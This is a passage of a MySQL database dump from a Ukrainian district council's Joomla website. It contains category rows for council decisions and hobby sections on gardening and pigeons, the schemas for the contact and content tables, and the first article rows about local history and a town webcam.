05:26:59',0,'*',1),(88,1812,29,75,76,3,'rishennja-radi/rishennja/rishennia-vid-22-07-2016-roku','com_content','Рішення від 22.07.2016 року','rishennia-vid-22-07-2016-roku','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2016-07-22 09:12:12',0,'2016-07-22 09:12:12',0,'*',1),(89,1836,29,77,78,3,'rishennja-radi/rishennja/rishennia-vid-31-08-2016-roku','com_content','Рішення від 31.08.2016 року','rishennia-vid-31-08-2016-roku','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2016-08-31 09:33:40',0,'2016-08-31 09:33:40',0,'*',1),(90,1884,29,79,80,3,'rishennja-radi/rishennja/rishennia-vid-21-10-2016-roku','com_content','Рішення від 21.10.2016 року','rishennia-vid-21-10-2016-roku','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2016-10-21 09:18:35',0,'2016-10-21 09:18:35',0,'*',1),(91,1891,29,81,82,3,'rishennja-radi/rishennja/rishennia-vid-26-10-2016-roku','com_content','Рішення від 26.10.2016 року','rishennia-vid-26-10-2016-roku','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2016-10-26 08:36:22',0,'2016-10-26 08:36:22',0,'*',1),(92,1899,29,83,84,3,'rishennja-radi/rishennja/rishennia-vid-09-11-2016-roku','com_content','Рішення від 09.11.2016 року','rishennia-vid-09-11-2016-roku','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2016-11-09 09:24:14',0,'2016-11-09 09:24:14',0,'*',1),(93,1926,29,85,86,3,'rishennja-radi/rishennja/rishennia-vid-07-12-2016-roku','com_content','Рішення від 07.12.2016 року','rishennia-vid-07-12-2016-roku','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2016-12-07 12:52:16',0,'2016-12-07 12:52:16',0,'*',1),(94,1947,29,87,88,3,'rishennja-radi/rishennja/rishennia-vid-21-12-2016-roku','com_content','Рішення від 21.12.2016 року','rishennia-vid-21-12-2016-roku','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2016-12-21 10:05:08',0,'2016-12-21 10:05:08',0,'*',1),(95,1957,29,89,90,3,'rishennja-radi/rishennja/rishennia-vid-27-12-2016-roku','com_content','Рішення від 27.12.2016 року','rishennia-vid-27-12-2016-roku','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2016-12-27 10:39:07',0,'2016-12-27 10:39:07',0,'*',1),(96,2010,29,91,92,3,'rishennja-radi/rishennja/rishennia-vid-17-03-2017-roku','com_content','Рішення від 17.03.2017 року','rishennia-vid-17-03-2017-roku','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2017-03-17 10:30:29',430,'2017-03-17 10:31:42',0,'*',1),(97,2020,29,93,94,3,'rishennja-radi/rishennja/rishennia-vid-22-03-2017-roku','com_content','Рішення від 22.03.2017 року','rishennia-vid-22-03-2017-roku','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2017-03-22 08:57:39',0,'2017-03-22 08:57:39',0,'*',1),(98,2076,29,95,96,3,'rishennja-radi/rishennja/rishennia-vid-16-06-2017-roku','com_content','Рішення від 16.06.2017 року','rishennia-vid-16-06-2017-roku','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2017-06-16 09:01:05',0,'2017-06-16 09:01:05',0,'*',1),(99,2109,29,97,98,3,'rishennja-radi/rishennja/rishennia-vid-28072017-roku','com_content','Рішення від 28.07.2017 року','rishennia-vid-28072017-roku','','	',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2017-07-28 08:33:28',0,'2017-07-28 08:33:28',0,'*',1),(100,2121,29,99,100,3,'rishennja-radi/rishennja/rishennia-vid-09082017-roku','com_content','Рішення від 09.08.2017 року','rishennia-vid-09082017-roku','','	',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2017-08-09 07:14:10',0,'2017-08-09 07:14:10',0,'*',1),(101,2160,29,101,102,3,'rishennja-radi/rishennja/rishennia-vid-271017-roku','com_content','Рішення від 27.10.2017 року','rishennia-vid-271017-roku','','		',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2017-10-25 12:46:51',430,'2017-12-24 15:20:15',0,'*',1),(102,2210,29,103,104,3,'rishennja-radi/rishennja/rishennia-vid-151217-roku','com_content','Рішення від 15.12.2017 року','rishennia-vid-151217-roku','','	',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2017-12-15 10:12:51',430,'2017-12-24 15:20:29',0,'*',1),(103,2250,29,105,106,3,'rishennja-radi/rishennja/rishennia-vid-02022018-roku','com_content','Рішення від 02.02.2018 року','rishennia-vid-02022018-roku','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2018-02-02 09:10:18',0,'2018-02-02 09:10:18',0,'*',1),(104,2310,29,107,108,3,'rishennja-radi/rishennja/rishennia-vid-23032018-roku','com_content','Рішення від 23.03.2018 року','rishennia-vid-23032018-roku','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2018-03-23 10:46:31',0,'2018-03-23 10:46:31',0,'*',1),(105,2374,29,109,110,3,'rishennja-radi/rishennja/rishennia-vid-15062018-roku','com_content','Рішення від 15.06.2018 року','rishennia-vid-15062018-roku','','	',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2018-06-15 08:37:44',0,'2018-06-15 08:37:44',0,'*',1),(106,2406,29,111,112,3,'rishennja-radi/rishennja/rishennia-vid-10082018-roku','com_content','Рішення від 10.08.2018 року','rishennia-vid-10082018-roku','','	',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2018-08-10 08:21:24',0,'2018-08-10 08:21:24',0,'*',1),(107,2440,29,113,114,3,'rishennja-radi/rishennja/rishennia-vid-26102018-roku','com_content','Рішення від 26.10.2018 року','rishennia-vid-26102018-roku','','	',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2018-10-26 08:42:43',0,'2018-10-26 08:42:43',0,'*',1),(108,2505,29,115,116,3,'rishennja-radi/rishennja/rishennia-vid-14122018-roku','com_content','Рішення від 14.12.2018 року','rishennia-vid-14122018-roku','','	',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2018-12-14 09:54:10',0,'2018-12-14 09:54:10',0,'*',1),(109,2554,1,147,148,1,'pasporty-biudzhetnykh-prohram','com_content','Паспорти бюджетних програм','pasporty-biudzhetnykh-prohram','','	',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2019-02-18 08:25:08',0,'2019-02-18 08:25:08',0,'*',1),(110,2561,29,117,118,3,'rishennja-radi/rishennja/rishennia-vid-22022019-roku','com_content','Рішення від 22.02.2019 року','rishennia-vid-22022019-roku','','	',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2019-02-22 09:11:10',0,'2019-02-22 09:11:10',0,'*',1),(111,2583,29,119,120,3,'rishennja-radi/rishennja/rishennia-vid-22032019-roku','com_content','Рішення від 22.03.2019 року','rishennia-vid-22032019-roku','','	',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2019-03-22 09:16:52',0,'2019-03-22 09:16:52',0,'*',1),(112,2611,29,121,124,3,'rishennja-radi/rishennja/rishennia-vid-14062019-roku','com_content','Рішення від 14.06.2019 року','rishennia-vid-14062019-roku','','	',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2019-06-14 08:13:00',0,'2019-06-14 08:13:00',0,'*',1),(113,2612,112,122,123,4,'rishennja-radi/rishennja/rishennia-vid-14062019-roku/rishennia-vid-14062019-roku','com_content','Рішення від 14.06.2019 року','rishennia-vid-14062019-roku','','	',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2019-06-14 08:15:15',0,'2019-06-14 08:15:15',0,'*',1),(114,2654,29,125,126,3,'rishennja-radi/rishennja/rishennia-vid-18102019-roku','com_content','Рішення від 18.10.2019 року','rishennia-vid-18102019-roku','','	',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2019-10-18 08:17:15',0,'2019-10-18 08:17:15',0,'*',1),(115,2700,29,127,128,3,'rishennja-radi/rishennja/rishennia-vid-11122019-roku','com_content','Рішення від 11.12.2019 року','rishennia-vid-11122019-roku','','		',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2019-12-11 11:34:10',430,'2019-12-11 09:35:43',0,'*',1),(116,2736,29,129,130,3,'rishennja-radi/rishennja/rishennia-vid-17022020-roku','com_content','Рішення від 17.02.2020 року','rishennia-vid-17022020-roku','','	',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2020-02-17 10:21:28',0,'2020-02-17 10:21:28',0,'*',1),(117,2747,29,131,132,3,'rishennja-radi/rishennja/rishennia-vid-26022020-roku','com_content','Рішення від 26.02.2020 року','rishennia-vid-26022020-roku','','	',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2020-02-26 13:36:44',0,'2020-02-26 13:36:44',0,'*',1),(118,2762,29,133,134,3,'rishennja-radi/rishennja/rishennia-vid-08042020-roku','com_content','Рішення від 08.04.2020 року','rishennia-vid-08042020-roku','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2020-04-08 07:47:19',0,'2020-04-08 07:47:19',0,'*',1),(119,2789,29,135,136,3,'rishennja-radi/rishennja/rishennia-vid-16062020-roku','com_content','Рішення від 16.06.2020 року','rishennia-vid-16062020-roku','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2020-06-16 12:48:15',430,'2020-06-16 09:48:41',0,'*',1),(120,2812,29,137,138,3,'rishennja-radi/rishennja/rishennia-vid-12082020-roku','com_content','Рішення від 12.08.2020 року','rishennia-vid-12082020-roku','','	',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2020-08-12 07:24:13',0,'2020-08-12 07:24:13',0,'*',1),(121,2816,1,149,150,1,'zapobihannia-proiavam-koruptsii','com_content','Запобігання проявам корупції','zapobihannia-proiavam-koruptsii','','	',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2020-08-12 12:26:08',0,'2020-08-12 12:26:08',0,'*',1),(122,2830,1,151,156,1,'sadivnytstvo','com_content','Садівництво','sadivnytstvo','','	',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2020-08-27 12:07:38',0,'2020-08-27 12:07:38',0,'*',1),(123,2831,122,152,153,2,'sadivnytstvo/zasoby-zakhystu','com_content','Засоби захисту','zasoby-zakhystu','','	',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2020-08-27 12:10:44',0,'2020-08-27 12:10:44',0,'*',1),(124,2832,122,154,155,2,'sadivnytstvo/dohliad','com_content','Догляд ','dohliad','','	',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2020-08-27 12:11:45',0,'2020-08-27 12:11:45',0,'*',1),(125,2833,1,157,170,1,'holuby','com_content','Голуби','holuby','','	',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2020-08-27 12:20:18',0,'2020-08-27 12:20:18',0,'*',1),(126,2834,125,158,159,2,'holuby/poshtovi','com_content','Поштові','poshtovi','','	',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2020-08-27 12:22:35',0,'2020-08-27 12:22:35',0,'*',1),(127,2835,125,160,161,2,'holuby/kinhy','com_content','Кінги','kinhy','','	',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2020-08-27 12:22:59',0,'2020-08-27 12:22:59',0,'*',1),(128,2836,125,162,163,2,'holuby/pavliny-pavychi','com_content','Павліни (павичі)','pavliny-pavychi','','	',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2020-08-27 12:24:51',0,'2020-08-27 12:24:51',0,'*',1),(129,2837,1,171,172,1,'rizni-porady','com_content','Контакти','rizni-porady','','		',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2020-08-27 15:32:33',430,'2020-12-16 14:07:45',0,'*',1),(130,2838,1,173,174,1,'oholoshennia','com_content','Оголошення','oholoshennia','','	',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2020-08-27 12:34:48',0,'2020-08-27 12:34:48',0,'*',1),(131,2846,133,178,179,2,'foto-ta-video/fotohalereia','com_content','Фотогалерея','fotohalereia','','		',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2020-08-30 13:15:58',430,'2020-08-30 17:51:49',0,'*',1),(132,2857,1,175,176,1,'qqq','com_users','qqq','qqq','','	',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2020-08-30 15:49:01',0,'2020-08-30 15:49:01',0,'*',1),(133,2861,1,177,182,1,'foto-ta-video','com_content','Фото та відео','foto-ta-video','','	',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2020-08-30 17:51:31',0,'2020-08-30 17:51:31',0,'*',1),(134,2862,133,180,181,2,'foto-ta-video/video','com_content','Відео','video','','	',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2020-08-30 17:52:27',0,'2020-08-30 17:52:27',0,'*',1),(135,2873,125,164,165,2,'holuby/informatsiia-holubivnykam','com_content','Інформація голубівникам','informatsiia-holubivnykam','','	',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2020-09-02 06:28:31',0,'2020-09-02 06:28:31',0,'*',1),(136,2916,125,166,167,2,'holuby/pomeranski-dutyshi','com_content','Померанські дутиші','pomeranski-dutyshi','','	',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2021-01-02 15:20:08',0,'2021-01-02 15:20:08',0,'*',1),(137,2962,125,168,169,2,'holuby/adana-turetska','com_content','Адана турецька','adana-turetska','','	',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2022-01-04 10:38:25',0,'2022-01-04 10:38:25',0,'*',1);
/*!40000 ALTER TABLE `fw3gt_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_contact_details`
--

DROP TABLE IF EXISTS `fw3gt_contact_details`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_contact_details` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL,
  `con_position` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `address` mediumtext COLLATE utf8mb4_unicode_ci,
  `suburb` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `state` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `country` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `postcode` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `telephone` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `fax` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `misc` longtext COLLATE utf8mb4_unicode_ci,
  `image` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `email_to` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `default_con` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `user_id` int(11) NOT NULL DEFAULT '0',
  `catid` int(11) NOT NULL DEFAULT '0',
  `access` int(10) unsigned NOT NULL DEFAULT '0',
  `mobile` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `webpage` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `sortname1` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `sortname2` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `sortname3` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `language` varchar(7) COLLATE utf8mb4_unicode_ci NOT NULL,
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(10) unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) unsigned NOT NULL DEFAULT '0',
  `metakey` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadesc` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadata` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `featured` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Set if article is featured.',
  `xreference` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'A reference to enable linkages to external data sets.',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `version` int(10) unsigned NOT NULL DEFAULT '1',
  `hits` int(10) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`published`),
  KEY `idx_catid` (`catid`),
  KEY `idx_createdby` (`created_by`),
  KEY `idx_featured_catid` (`featured`,`catid`),
  KEY `idx_language` (`language`),
  KEY `idx_xreference` (`xreference`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_contact_details`
--

LOCK TABLES `fw3gt_contact_details` WRITE;
/*!40000 ALTER TABLE `fw3gt_contact_details` DISABLE KEYS */;
INSERT INTO `fw3gt_contact_details` VALUES (1,'Адміністратор','administrator','','','Малин','Житомирська','Україна','11601','','','<p><span style=\"font-size: 18.6667px;\"><em style=\"font-weight: bold;\">&nbsp;</em></span></p>','','malehus@ukr.net',0,1,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_tags\":\"\",\"show_info\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"add_mailto_link\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_image\":\"\",\"show_misc\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"articles_display_num\":\"\",\"show_profile\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linka\":false,\"linkb_name\":\"\",\"linkb\":false,\"linkc_name\":\"\",\"linkc\":false,\"linkd_name\":\"\",\"linkd\":false,\"linke_name\":\"\",\"linke\":false,\"contact_layout\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}',430,4,1,'','','','','','*','2014-09-19 11:09:24',430,'','2020-12-16 10:09:59',430,'','','{\"robots\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00',7,2617);
/*!40000 ALTER TABLE `fw3gt_contact_details` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_content`
--

DROP TABLE IF EXISTS `fw3gt_content`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_content` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `asset_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to the #__assets table.',
  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `introtext` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `fulltext` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `state` tinyint(3) NOT NULL DEFAULT '0',
  `catid` int(10) unsigned NOT NULL DEFAULT '0',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(10) unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `images` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `urls` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `attribs` varchar(5120) COLLATE utf8mb4_unicode_ci NOT NULL,
  `version` int(10) unsigned NOT NULL DEFAULT '1',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `metakey` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadesc` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `access` int(10) unsigned NOT NULL DEFAULT '0',
  `hits` int(10) unsigned NOT NULL DEFAULT '0',
  `metadata` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `featured` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Set if article is featured.',
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The language code for the article.',
  `xreference` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `note` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`state`),
  KEY `idx_catid` (`catid`),
  KEY `idx_createdby` (`created_by`),
  KEY `idx_featured_catid` (`featured`,`catid`),
  KEY `idx_language` (`language`),
  KEY `idx_xreference` (`xreference`),
  KEY `idx_alias` (`alias`(191))
) ENGINE=InnoDB AUTO_INCREMENT=2547 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_content`
--

LOCK TABLES `fw3gt_content` WRITE;
/*!40000 ALTER TABLE `fw3gt_content` DISABLE KEYS */;
INSERT INTO `fw3gt_content` VALUES (100,189,'Замальовки Малина у виконанні Миклухо-Маклая','zamalovki-malina-u-vikonanni-mikluho-maklaja','<p><img src=\"images/stories/malyn_mikluho2.jpg\" border=\"0\" /></p><p><img src=\"images/stories/malyn_mikluho1.jpg\" border=\"0\" /></p><h6> <em><strong><font color=\"#993300\"> Ці замальовки-ескізи Малина виконав Миклухо-Маклай, перебуваючи у родинному маєтку. Ескізи були знайдені в Державній бібліотеці штату Нова Південна Валія ( Австралія) та надіслані тимчасово повіреним у справах України  в Австралії Станіславом Сташевським депутату Малинської районної ради, історику-краєзнавцю Василю Тимошенку. </font></strong></em></h6>','',1,8,'2012-04-04 09:44:41',431,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2012-04-04 09:44:41','0000-00-00 00:00:00','','','',1,54,'','  Ці замальовки-ескізи Малина виконав Миклухо-Маклай, перебуваючи у родинному маєтку. Ескізи були знайдені в Державній бібліотеці штату Нова Південна Валія ( Австралія) та надіслані тимчасово пові...',1,1257,'',1,'*','',''),(776,865,'Веб-камера в центрі Малина','veb-kamera-v-centri-malina','<h1><a mce_href=\"http://ipcam.lux-net.com.ua/\" href=\"http://ipcam.lux-net.com.ua/\">Веб-камера: м. Малин, Житомирська область, пл. Соборна від http://lux-net.com.ua/</a><img style=\"float: right;\" mce_style=\"float: right;\" src=\"http://www.malyn-rayrada.org.ua/images/stories/vebcamer.jpg\" mce_src=\"images/stories/vebcamer.jpg\" alt=\"\"><br /></h1>','',1,8,'2014-04-15 16:27:13',431,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2014-04-15 16:27:13','0000-00-00 00:00:00','','','',1,55,'','Веб-камера: м. Малин, Житомирська область, пл. Соборна від 